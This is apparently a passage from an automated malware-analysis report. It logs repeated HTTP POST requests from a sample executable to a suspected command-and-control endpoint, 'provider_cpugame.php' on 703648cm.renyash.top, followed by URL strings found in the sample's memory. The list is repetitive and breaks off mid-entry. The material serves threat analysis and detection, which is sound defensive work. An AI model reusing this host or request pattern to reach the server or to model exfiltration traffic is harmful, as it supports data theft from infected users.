                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2192Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2192Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2204Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2192Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2204Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: 703648cm.renyash.top
                                    Source: unknownHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://703648cm.reP
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://703648cm.renyash.top
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://703648cm.renyash.top/
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002D83000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://703648cm.renyash.top/provider_cpugame.php
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://703648cm.renyash.top/provider_cpugame.phpp
                                    Source: ChainFontruntimeCrt.exe, 00000004.00000002.1754509420.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2999403848.000000001EC02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013190000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013027000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001387F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013446000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013F6B000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013ED3000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013918000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013B50000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000135AE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000012EBF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013228000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000140D4000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000137AF000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D19000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000141E6000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.000000001403C000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013717000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000139E8000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.00000000134DE000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2966939743.0000000013D6B000.00000004.00000800.00020000.00000000.sdmp, 